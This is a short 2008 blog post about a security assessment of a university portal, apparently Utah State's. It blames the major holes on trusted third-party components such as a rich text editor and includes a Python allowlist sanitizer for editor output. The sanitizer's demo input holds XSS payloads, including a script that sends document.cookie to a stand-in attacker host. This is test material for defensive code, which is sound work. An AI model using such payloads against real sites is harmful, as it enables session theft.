02 June, 2008

usu's ezportal security assessment

about 3 weeks ago i finished a security assessment for a new application the university of utah is planning on rolling out so that students, teachers, and staff can manage all of their usu data.

our analysis included looking at the overall application architecture, looking at the code, and a test to try to exploit vulnerabilities.

i thought it was interesting that every major hole in the application came from the developers trusting the libraries and subcomponents they were using. for example, the developers were using an open source rich text editor (so that users could upload nice-looking content without having to know html) that could easily be exploited to upload malicious code, or to render content from any other site (yes, as in an xss attack).
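the fix for that class of bug is not to trust what the editor hands back at all: treat its output as untrusted html and rebuild it server-side from an allowlist. the sanitizer below is an added example written for this post, not code from the ezportal project or from the editor in question; it assumes a python server-side component and uses a hypothetical trusted host (`portal.example.edu`) to show how "render content from any other site" can be blocked. it uses only the standard library.

```python
"""Allowlist sanitizer for rich-text-editor output (added example, not ezportal code)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags the editor legitimately produces and we are willing to render.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "u", "ul", "ol", "li",
                "h1", "h2", "h3", "blockquote", "a", "img"}
# Attributes permitted per tag; anything else (on* handlers, style, target) is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# Elements whose *contents* are discarded as well, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript"}
# Hypothetical: only resources hosted on our own portal may be embedded.
TRUSTED_HOSTS = {"portal.example.edu"}


def safe_url(value, external_ok):
    """Return a cleaned URL, or None if it must not be emitted.

    external_ok=True permits links to other sites (a plain <a href>);
    external_ok=False restricts the URL to TRUSTED_HOSTS (embedded resources).
    """
    # Strip whitespace and control characters browsers ignore ("java\tscript:").
    value = "".join(ch for ch in value if ch > " ")
    parsed = urlparse(value)
    scheme = parsed.scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return None  # javascript:, data:, vbscript:, ...
    if scheme and not parsed.netloc:
        return None  # "http:evil" and similar malformed absolute URLs
    host = (parsed.hostname or "").lower()
    if host and not external_ok and host not in TRUSTED_HOSTS:
        return None  # would pull content from a foreign site
    return value


class RichTextSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_stack = []  # open elements from DROP_WITH_CONTENT

    def handle_starttag(self, tag, attrs):
        if self.skip_stack:
            if tag not in VOID_TAGS:
                self.skip_stack.append(tag)
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_stack.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag but keep its text content
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name in ("href", "src"):
                value = safe_url(value, external_ok=(name == "href"))
                if value is None:
                    continue
            parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if self.skip_stack:
            if tag in self.skip_stack:  # close the dropped element (and any nested junk)
                while self.skip_stack.pop() != tag:
                    pass
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_stack:
            self.out.append(escape(data))  # text is always re-escaped


def sanitize(html):
    """Sanitize one fragment of editor output and return safe HTML."""
    parser = RichTextSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample of what a malicious "rich text" submission might contain.
    sample = ('<p onclick="steal()">hello <b>world</b></p>'
              '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
              '<iframe src="http://evil.example/"></iframe>'
              '<img src="javascript:alert(1)" onerror="alert(2)">')
    print(sanitize(sample))
```

comments and declarations are discarded by the parser's defaults, so conditional-comment tricks go with them. note the two different policies on urls: a link may point anywhere on http(s), but an embedded image may only be loaded from the portal's own host, which is the check that stops the "render content from any other site" case the assessment found.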

so, the mantra of "find the dependencies -- and eliminate them", turns out to be true for security problems too.